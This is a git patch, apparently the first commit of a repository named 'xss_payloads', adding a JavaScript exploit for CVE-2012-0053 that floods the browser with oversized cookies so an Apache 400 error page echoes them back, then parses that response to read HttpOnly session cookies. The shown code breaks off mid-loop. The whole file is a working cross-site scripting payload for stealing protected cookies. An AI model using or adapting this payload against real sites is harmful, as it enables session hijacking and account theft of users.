From 79558b73e2a4d58ab70aa56140b5ccf52161fdb0 Mon Sep 17 00:00:00 2001
From: Strawp
Date: Wed, 18 May 2016 14:14:39 +0100
Subject: [PATCH] first commit
---
README.md | 1 +
apache_httponly_bypass.js | 43 +++++++++++++++++++++++++++++++++++++++
2 files changed, 44 insertions(+)
create mode 100644 README.md
create mode 100644 apache_httponly_bypass.js
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..919ec1e
--- /dev/null
+++ b/README.md
@@ -0,0 +1 @@
+# xss_payloads
diff --git a/apache_httponly_bypass.js b/apache_httponly_bypass.js
new file mode 100644
index 0000000..4f2609a
--- /dev/null
+++ b/apache_httponly_bypass.js
@@ -0,0 +1,43 @@
+// Exploit for CVE-2012-0053
+
+// Set megacookie
+for( var j=0; j<100; j++ ){
+ var c = "x"+j+"=";
+ for( var i=0; i<500; i++ ){
+ c+='A';
+ }
+ document.cookie = c;
+}
+
+x=new XMLHttpRequest();
+x.onreadystatechange = function(){
+ if( x.readyState == 4 ){
+ var data = '';
+
+ // 400 == exploit worked
+ if( x.status == 400 ){
+ aC = x.responseText.match(/
([\s\S]*)<\/pre>/gm)[0].split(';');
+      for( var i=0; i